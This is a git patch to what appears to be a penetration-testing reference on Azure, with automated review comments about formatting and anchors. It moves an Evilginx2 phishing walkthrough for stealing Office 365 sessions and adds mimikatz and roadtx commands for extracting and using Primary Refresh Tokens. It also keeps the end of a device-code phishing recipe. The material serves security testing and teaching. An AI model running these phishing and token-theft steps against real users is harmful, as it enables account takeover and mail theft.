From 4947154dc773ac606376c34d065f03bfc13b7fd0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Nov 2023 23:34:26 +0100 Subject: [PATCH] Evilginx Phishlet --- docs/cloud/azure/Cloud - Azure Pentest.md | 23 ----------------- docs/cloud/azure/azure-access-and-token.md | 6 +++-- .../azure/azure-devices-users-services.md | 13 +++++++++- docs/cloud/azure/azure-phishing.md | 25 ++++++++++++++++++- docs/cloud/azure/azure-services.md | 4 +-- 5 files changed, 42 insertions(+), 29 deletions(-) diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md index c19a18e..173ffd7 100644 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -16,7 +16,6 @@ * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) * [Enumerate manually](#enumerate-manually) * [Enumeration methodology](#enumeration-methodology) -* [Phishing with Evilginx2](#phishing-with-evilginx2) * [Token from Managed Identity](#token-from-managed-identity) * [Azure API via Powershell](#azure-api-via-powershell) * [Azure API via Python Version](#azure-api-via-python-version) 
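Review bot: dropping the TOC entry `* [Phishing with Evilginx2](#phishing-with-evilginx2)` is consistent with the section removal later in this patch, but nothing left in `Cloud - Azure Pentest.md` tells a reader where the content went; add a one-line pointer to `docs/cloud/azure/azure-phishing.md` (in the intro or next to the remaining phishing-related headings), since any existing link to `#phishing-with-evilginx2` on this page will simply stop resolving.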
@@ -439,28 +438,6 @@ PS Az> Get-AzStorageAccount | fl PS Az> Get-AzKeyVault ``` -## Phishing with Evilginx2 - -```powershell -PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets -: config domain username.corp -: config ip 10.10.10.10 -: phishlets hostname o365 login.username.corp -: phishlets get-hosts o365 - -Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine - -# copy certificate and enable the phishing -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key -: phishlets enable o365 - -# get the phishing URL -: lures create o365 -: lures get-url 0 -``` - - ## Token from Managed Identity diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 59396a0..41e943e 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -91,13 +91,15 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 * Use PRT token ```ps1 - roadtx browserprtauth -prt roadtx.prt -url http://www.office.com + roadtx browserprtauth --prt --prt-sessionkey + roadtx browserprtauth --prt roadtx.prt -url http://www.office.com ``` ### Extract PRT v1 ```ps1 +mimikatz # token::elevate mimikatz # sekurlsa::cloudap mimikatz # sekurlsa::dpapi mimikatz # dpapi::cloudapkd /keyvalue: /unprotect @@ -110,7 +112,7 @@ roadtx browserprtauth --prt --prt-sessionkey --keep-open -url * No method known to date. -### Generate a PRT by registering a device +### Upgrade Refresh Token to PRT ```ps1 # Get correct token audience diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md index cd8e733..ad03a57 100644 --- a/docs/cloud/azure/azure-devices-users-services.md 
+++ b/docs/cloud/azure/azure-devices-users-services.md @@ -45,4 +45,15 @@ roadtx browserprtauth --prt --prt-sessionkey --kee ``` -# Service Principals \ No newline at end of file +# Service Principals + + + +# Other + +Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph: + +```ps1 +roadtx getscope -s https://graph.microsoft.com/mail.read +roadtx findscope -s https://graph.microsoft.com/mail.read +``` diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md index 243e227..eef46d7 100644 --- a/docs/cloud/azure/azure-phishing.md +++ b/docs/cloud/azure/azure-phishing.md @@ -97,4 +97,27 @@ roadtx codeauth -c -r msgraph -t <0.A....> -ru 'https://` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft) * Leave TokenTactics running in the PowerShell window and send the phishing email * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form -* Enjoy your **access token** and **refresh token** \ No newline at end of file +* Enjoy your **access token** and **refresh token** + + +## Phishing with Evilginx2 + +* Run `evilginx2` with o365 phishlet + ```powershell + PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets + : config domain username.corp + : config ip 10.10.10.10 + : phishlets hostname o365 login.username.corp + : phishlets get-hosts o365 + ``` +* Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine +* Copy certificate and enable the phishing + ```ps1 + PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt + PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key + : phishlets enable o365 + + # get the phishing URL + : lures create o365 + : lures get-url 0 + ``` 
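Review bot: the two fenced blocks in the relocated `## Phishing with Evilginx2` section use different info strings (` ```powershell ` for the first, ` ```ps1 ` for the second) while containing the same mix of `PS C:\Tools>` and evilginx `:` prompt lines; pick one tag, preferably `ps1`, which the other files touched by this patch use. The split itself is an improvement: in the copy removed from `Cloud - Azure Pentest.md` the DNS instruction sat inside the code fence as a prose line, and here it is a proper bullet. Two small wording points on that bullet: "Create a DNS entry type A for ..." reads better as "Create a type A DNS entry for ...", and if `azure-phishing.md` keeps its own index at the top (the way `Cloud - Azure Pentest.md` does), the new heading needs an entry there, since this hunk only adds the section body.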
diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index 5e43ebd..6c23630 100644 --- a/docs/cloud/azure/azure-services.md +++ b/docs/cloud/azure/azure-services.md @@ -50,7 +50,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | ``` -## Outlook Mails +### Outlook Mails * Read user mails ```ps1 @@ -58,7 +58,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Get-MgUserMessageContent -OutFile mail.txt -UserId -MessageId ``` -## OneDrive Files +### OneDrive Files ```ps1 $userId = ""
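Review bot: in `azure-access-and-token.md` hunk `@@ -91,13 +91,15 @@`, the added line `roadtx browserprtauth --prt --prt-sessionkey` carries both flags without values, and the line kept below it mixes double-dash `--prt roadtx.prt` with single-dash `-url`; if angle-bracket placeholders were intended they have not survived into the patch (the unchanged context `roadtx browserprtauth --prt --prt-sessionkey --keep-open -url` shows the same gap), so either write the placeholders out explicitly, e.g. `--prt <prt> --prt-sessionkey <sessionkey>`, or keep only the file-based `--prt roadtx.prt` form and use one dash style on both lines.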
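Review bot: in `azure-access-and-token.md` hunk `@@ -110,7 +112,7 @@`, renaming `### Generate a PRT by registering a device` to `### Upgrade Refresh Token to PRT` changes the heading's anchor, so any TOC entry or cross-page link to `#generate-a-prt-by-registering-a-device` now breaks; grep the docs for the old anchor before merging. The old title also carried information the new one drops (that the upgrade is done by registering a device); the body that follows opens straight with `# Get correct token audience`, so a one-sentence intro under the new heading would keep that context in the text.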
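Review bot: in `azure-devices-users-services.md` hunk `@@ -45,4 +45,15 @@`, `# Service Principals` is left as an empty heading (only blank lines between it and the new `# Other`), and the new section's lead sentence says the command "Lists all the client IDs you can use to get a token with the `mail.read` scope" but then shows two commands, `roadtx getscope` and `roadtx findscope`, without saying how they differ; either document what each returns or keep the one the sentence describes. `# Other` is also a weak heading for a section with one specific purpose; something like `# Client IDs per scope` would make it findable. The `\ No newline at end of file` fix is fine.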
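Review bot: in `azure-services.md` hunk `@@ -50,7 +50,7 @@`, demoting `## Outlook Mails` to `### Outlook Mails` makes it a child of whatever `##` heading precedes the `Get-AADIntTeamsMessages` block, which is outside the hunk; confirm that parent is the intended one (the surrounding content suggests a Teams-specific section, which would be an odd parent for Outlook) rather than, say, a general "Microsoft 365 data" heading. GitHub anchors do not depend on heading level, so existing links to `#outlook-mails` keep resolving.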
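Review bot: in `azure-services.md` hunk `@@ -58,7 +58,7 @@`, the same level change is applied to `### OneDrive Files`, but only these two headings are touched; if further per-service headings follow `OneDrive Files` in this file, they need the same demotion or the nesting becomes inconsistent (two `###` subsections followed by `##` siblings of their parent). Worth a quick look at the rest of the file before merging.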